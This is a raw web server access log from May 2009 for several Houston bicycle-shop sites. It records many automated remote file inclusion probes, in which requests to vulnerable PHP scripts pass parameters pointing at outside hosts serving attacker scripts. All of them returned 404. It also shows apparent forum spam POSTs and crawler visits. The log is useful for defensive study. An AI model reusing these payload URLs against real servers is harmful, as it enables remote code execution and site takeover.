217.199.222.19 - - [10/May/2009:10:17:34 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.115.89.68 - - [10/May/2009:10:19:11 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.115.89.68 - - [10/May/2009:10:19:11 -0700] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.115.89.68 - - [10/May/2009:10:19:11 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
74.6.17.157 - - [10/May/2009:10:35:52 -0700] "GET /logs/?S=D HTTP/1.0" 200 2352 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
91.121.150.170 - - [10/May/2009:11:03:00 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [10/May/2009:11:03:00 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [10/May/2009:11:15:54 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [10/May/2009:11:16:42 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
92.115.249.16 - - [10/May/2009:11:18:53 -0700] "GET /bullitinboard/viewtopic.php?p=11114&sid=e2636c9e9c6e7c5ad403d89f15443edc HTTP/1.0" 200 438 "http://www.svbikes.com/bullitinboard//viewtopic.php?p=11114&sid=e2636c9e9c6e7c5ad403d89f15443edc" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.svbikes.com"
92.115.249.16 - - [10/May/2009:11:18:55 -0700] "GET / HTTP/1.0" 200 1748 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.svbikes.com"
92.115.249.16 - - [10/May/2009:11:19:04 -0700] "GET /bullitinboard/ HTTP/1.0" 200 517 "http://www.svbikes.com/bullitinboard/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [10/May/2009:11:23:10 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [10/May/2009:11:23:36 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 518 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [10/May/2009:11:35:41 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [10/May/2009:11:49:46 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [10/May/2009:11:57:14 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
58.227.193.198 - - [10/May/2009:12:07:49 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.laxestereo.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
58.227.193.198 - - [10/May/2009:12:07:49 -0700] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.laxestereo.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
58.227.193.198 - - [10/May/2009:12:07:49 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.laxestereo.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [10/May/2009:12:25:12 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
65.55.106.236 - - [10/May/2009:12:25:48 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "svbikes.com"
65.55.106.236 - - [10/May/2009:12:26:50 -0700] "GET / HTTP/1.0" 200 1748 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "svbikes.com"
219.94.148.39 - - [10/May/2009:12:30:17 -0700] "GET /shop/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
219.94.148.39 - - [10/May/2009:12:30:18 -0700] "GET /logs/shop/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
219.94.148.39 - - [10/May/2009:12:30:22 -0700] "GET /logs/access.log/shop/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
72.30.142.82 - - [10/May/2009:12:31:51 -0700] "GET /tmp/ HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "svbikes.com"
76.164.212.18 - - [10/May/2009:12:36:47 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://presentationsplus.net/tmp/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
76.164.212.18 - - [10/May/2009:12:37:11 -0700] "GET /translations/Turkish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://presentationsplus.net/tmp/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
91.121.150.170 - - [10/May/2009:12:38:01 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
72.30.78.244 - - [10/May/2009:12:41:08 -0700] "GET /bullitinboard/viewtopic.php?p=15826 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
91.121.150.170 - - [10/May/2009:12:44:22 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
81.19.66.38 - - [10/May/2009:12:56:54 -0700] "GET /bullitinboard/viewtopic.php?p=1662 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/May/2009:12:56:55 -0700] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/May/2009:12:56:56 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/May/2009:12:56:56 -0700] "GET /bullitinboard/viewtopic.php?p=1972 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/May/2009:12:56:57 -0700] "GET /bullitinboard/viewtopic.php?p=1625 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
76.164.212.18 - - [10/May/2009:12:59:37 -0700] "GET /translations/Danish.txt//tools/send_reminders.php?noSet=0&includedir=http://presentationsplus.net/tmp/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
76.164.212.18 - - [10/May/2009:12:59:37 -0700] "GET /translations/Italian.txt//tools/send_reminders.php?noSet=0&includedir=http://presentationsplus.net/tmp/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
76.164.212.18 - - [10/May/2009:12:59:37 -0700] "GET /translations/Swedish.txt//tools/send_reminders.php?noSet=0&includedir=http://presentationsplus.net/tmp/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
76.164.212.18 - - [10/May/2009:12:59:47 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://presentationsplus.net/tmp/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
76.164.212.18 - - [10/May/2009:12:59:47 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://presentationsplus.net/tmp/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
76.164.212.18 - - [10/May/2009:12:59:47 -0700] "GET /translations/Portuguese_BR.txt//tools/send_reminders.php?noSet=0&includedir=http://presentationsplus.net/tmp/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
76.164.212.18 - - [10/May/2009:13:17:00 -0700] "GET //vwar/backup/errors.php?error=http://presentationsplus.net/tmp/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
76.164.212.18 - - [10/May/2009:13:17:00 -0700] "GET /logs///vwar/backup/errors.php?error=http://presentationsplus.net/tmp/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
76.164.212.18 - - [10/May/2009:13:17:00 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://presentationsplus.net/tmp/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.210.221 - - [10/May/2009:13:22:21 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.210.221 - - [10/May/2009:13:22:21 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.210.221 - - [10/May/2009:13:22:21 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
208.80.195.42 - - [10/May/2009:13:58:51 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; Zango 10.0.341.0)" "houstonbikeshop.com"
74.6.17.160 - - [10/May/2009:14:07:56 -0700] "GET /bullitinboard/ HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.svbikes.com"
81.19.66.38 - - [10/May/2009:14:12:59 -0700] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/May/2009:14:13:00 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/May/2009:14:13:00 -0700] "GET /bullitinboard/viewtopic.php?p=1972 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/May/2009:14:13:01 -0700] "GET /bullitinboard/viewtopic.php?p=2005 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/May/2009:14:13:02 -0700] "GET /bullitinboard/viewtopic.php?p=1624 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
58.227.193.198 - - [10/May/2009:14:15:28 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.laxestereo.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
58.227.193.198 - - [10/May/2009:14:15:28 -0700] "GET /translations/Italian.txt//tools/send_reminders.php?noSet=0&includedir=http://www.laxestereo.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
58.227.193.198 - - [10/May/2009:14:15:28 -0700] "GET /translations/Danish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.laxestereo.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
58.227.193.198 - - [10/May/2009:14:15:28 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.laxestereo.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
58.227.193.198 - - [10/May/2009:14:15:28 -0700] "GET /translations/Swedish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.laxestereo.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
58.227.193.198 - - [10/May/2009:14:15:28 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.laxestereo.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
58.227.193.198 - - [10/May/2009:14:15:28 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.laxestereo.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
67.19.228.18 - - [10/May/2009:14:16:34 -0700] "GET /translations/Danish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "houstonbikeshop.com"
67.19.228.18 - - [10/May/2009:14:16:34 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "houstonbikeshop.com"
67.19.228.18 - - [10/May/2009:14:16:34 -0700] "GET /translations/Italian.txt//tools/send_reminders.php?noSet=0&includedir=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "houstonbikeshop.com"
67.19.228.18 - - [10/May/2009:14:16:34 -0700] "GET /translations/Swedish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "bicyclestoreshouston.com"
67.19.228.18 - - [10/May/2009:14:16:34 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "bicyclestoreshouston.com"
67.19.228.18 - - [10/May/2009:14:16:34 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "houstonbikeshop.com"
67.19.228.18 - - [10/May/2009:14:16:34 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "bicyclestoreshouston.com"
67.19.228.18 - - [10/May/2009:14:16:35 -0700] "GET /translations/Turkish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "bicyclestoreshouston.com"
70.85.192.18 - - [10/May/2009:14:17:22 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "houstonbikeshop.com"
70.85.192.18 - - [10/May/2009:14:17:22 -0700] "GET /translations/Italian.txt//tools/send_reminders.php?noSet=0&includedir=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "houstonbikeshop.com"
70.85.192.18 - - [10/May/2009:14:17:22 -0700] "GET /translations/Danish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "houstonbikeshop.com"
70.85.192.18 - - [10/May/2009:14:17:22 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "houstonbikeshop.com"
70.85.192.18 - - [10/May/2009:14:17:23 -0700] "GET /translations/Swedish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "bicyclestoreshouston.com"
70.85.192.18 - - [10/May/2009:14:17:23 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "bicyclestoreshouston.com"
70.85.192.18 - - [10/May/2009:14:17:23 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "bicyclestoreshouston.com"
70.85.192.18 - - [10/May/2009:14:17:35 -0700] "GET /translations/Turkish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "bicyclestoreshouston.com"
91.195.150.20 - - [10/May/2009:14:18:49 -0700] "GET /translations/Danish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "houstonbikeshop.com"
91.195.150.20 - - [10/May/2009:14:18:49 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "bicyclestoreshouston.com"
91.195.150.20 - - [10/May/2009:14:18:49 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "houstonbikeshop.com"
91.195.150.20 - - [10/May/2009:14:18:49 -0700] "GET /translations/Italian.txt//tools/send_reminders.php?noSet=0&includedir=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "houstonbikeshop.com"
91.195.150.20 - - [10/May/2009:14:18:49 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "houstonbikeshop.com"
91.195.150.20 - - [10/May/2009:14:18:49 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "bicyclestoreshouston.com"
91.195.150.20 - - [10/May/2009:14:18:49 -0700] "GET /translations/Swedish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "bicyclestoreshouston.com"
91.195.150.20 - - [10/May/2009:14:18:49 -0700] "GET /translations/Turkish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "bicyclestoreshouston.com"
72.30.79.122 - - [10/May/2009:14:20:59 -0700] "GET /logs/?M=D HTTP/1.0" 200 2352 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
222.239.227.155 - - [10/May/2009:14:23:11 -0700] "GET /translations/Russian.txt//tools/send_reminders.php?noSet=0&includedir=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
222.239.227.155 - - [10/May/2009:14:23:11 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
222.239.227.155 - - [10/May/2009:14:23:11 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
222.239.227.155 - - [10/May/2009:14:23:18 -0700] "GET /translations/Italian.txt//tools/send_reminders.php?noSet=0&includedir=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
222.239.227.155 - - [10/May/2009:14:23:42 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
222.239.227.155 - - [10/May/2009:14:23:42 -0700] "GET /translations/Turkish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
222.239.227.155 - - [10/May/2009:14:23:42 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
222.239.227.155 - - [10/May/2009:14:23:57 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
91.195.150.20 - - [10/May/2009:14:26:08 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.svbikes.com"
91.195.150.20 - - [10/May/2009:14:26:08 -0700] "GET /translations/Portuguese_BR.txt//tools/send_reminders.php?noSet=0&includedir=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.svbikes.com"
91.195.150.20 - - [10/May/2009:14:26:08 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.svbikes.com"
194.8.75.94 - - [10/May/2009:14:48:56 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://www.svbikes.com/bullitinboard//index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Avant Browser [avantbrowser.com]; Hotbar 4.4.5.0)" "www.svbikes.com"
194.8.75.94 - - [10/May/2009:14:48:56 -0700] "GET / HTTP/1.0" 200 1748 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Avant Browser [avantbrowser.com]; Hotbar 4.4.5.0)" "www.svbikes.com"
194.8.75.94 - - [10/May/2009:14:48:57 -0700] "GET /bullitinboard/ HTTP/1.0" 200 517 "http://www.svbikes.com/bullitinboard/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Avant Browser [avantbrowser.com]; Hotbar 4.4.5.0)" "www.svbikes.com"
91.121.150.170 - - [10/May/2009:15:04:42 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
72.30.78.244 - - [10/May/2009:15:06:36 -0700] "GET /tmp/?S=A HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
91.121.150.170 - - [10/May/2009:15:06:55 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
72.30.79.122 - - [10/May/2009:15:12:28 -0700] "GET /Rides.html HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
91.121.150.170 - - [10/May/2009:15:20:05 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [10/May/2009:15:20:14 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
72.30.78.244 - - [10/May/2009:15:20:36 -0700] "GET /?S=D HTTP/1.0" 200 1748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
91.121.150.170 - - [10/May/2009:15:24:16 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [10/May/2009:15:26:20 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
